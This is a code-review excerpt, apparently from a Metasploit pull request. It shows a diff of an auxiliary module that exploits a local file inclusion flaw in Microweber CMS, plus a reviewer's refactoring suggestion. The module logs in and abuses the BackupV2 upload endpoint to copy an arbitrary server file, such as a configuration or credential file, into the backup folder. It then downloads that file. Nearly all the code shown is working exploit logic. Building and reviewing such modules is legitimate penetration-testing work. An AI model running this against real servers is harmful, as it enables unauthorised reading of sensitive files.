modules/auxiliary/gather/microweber_lfi.rb

```diff
@@ -0,0 +1,179 @@
+      print_good 'Microweber ' + version
+      return true
+    end
+
+    print_error 'Microweber ' + version
+    return false
+  end
+
+  def try_login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'lang' => '',
+        'where_to' => 'admin_content'
+      }
+    })
+
+    if res.headers['Content-Type'] != 'application/json'
+      print_status res.body
+      return false
+    end
+
+    json_res = res.get_json_document
+
+    if res.code != 200
+      print_error 'Microweber cannot be reached.'
+      return false
+    end
+
+    if !json_res['error'].nil?
+      print_error json_res['error']
+      return false
+    end
+
+    if !json_res['success'].nil? && json_res['success'] == 'You are logged in'
+      print_good json_res['success']
+      @cookie = res.get_cookies
+      return true
+    end
+
+    print_error 'An unknown error occurred.'
+    return false
+  end
+
+  def try_upload
+    print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'src' => datastore['LOCAL_FILE_PATH']
+      },
+      'headers' => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      json_res = res.get_json_document
+
+      if json_res['success']
+        print_good json_res['success']
+        return true
+      end
+    end
+
+    print_error 'Either the file cannot be read or the file does not exist.'
+    return false
+  end
+
+  def try_download
+    filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+    print_status 'Downloading ' + filename + ' from the backup folder.'
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'filename' => filename
+      },
+      'headers' => {
+        'Referer' => datastore['SSL'] ? 'https://' + datastore['RHOSTS'] + target_uri.path : 'http://' + datastore['RHOSTS'] + target_uri.path
+      }
+    })
+
+    if res.headers['Content-Type'] == 'application/json'
+      json_res = res.get_json_document
+
+      if json_res['error']
+        print_error json_res['error']
+        return
+      end
+    end
+
+    print_status res.body
+  end
+
+  def run
+    if !check_version || !try_login
+      return
+    end
+
+    if try_upload
+      try_download
+    end
```

Comment:
By prepending `Msf::Exploit::Remote::AutoCheck` the `check` method is run prior to the `run` method and will halt execution in a not vulnerable code is returned.
With other changes suggested to have methods call `fail_with` the module will raise early avoiding the need to run test each method call result.
```suggestion
    try_login
    try_upload
    try_download
```

Reply:
Fixed.